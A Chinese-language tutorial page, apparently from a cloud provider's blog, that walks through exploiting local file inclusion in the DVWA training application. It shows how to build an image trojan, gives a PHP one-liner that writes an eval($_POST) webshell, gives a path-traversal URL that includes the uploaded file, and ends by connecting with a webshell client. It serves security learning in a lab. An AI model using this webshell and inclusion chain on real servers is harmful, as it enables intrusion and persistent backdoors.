温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

大数据中本地文件包含漏洞是怎样的

发布时间:2021-12-10 09:25:55 来源:亿速云 阅读:153 作者:柒染 栏目:大数据

大数据中本地文件包含漏洞是怎样的,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

一、本地文件包含漏洞:

环境:DVWA,low级别

1、制作一句话图片木马

第一种方法:

windows命令

copy 1.jpg/b+1.php 2.jpg

大数据中本地文件包含漏洞是怎样的

第二种方法:

将照片拖入edjpgcom软件,添加下面这句话

<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>

大数据中本地文件包含漏洞是怎样的

2、上传图片木马文件

大数据中本地文件包含漏洞是怎样的

3、选择文件包含页面

大数据中本地文件包含漏洞是怎样的

4、执行文件包含并生成后门

192.168.152.188/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/1.jpg

大数据中本地文件包含漏洞是怎样的

5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php

大数据中本地文件包含漏洞是怎样的

6、菜刀链接

大数据中本地文件包含漏洞是怎样的

大数据中本地文件包含漏洞是怎样的

二、环境:DVWA,medium级别

同low级别

关于大数据中本地文件包含漏洞是怎样的问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI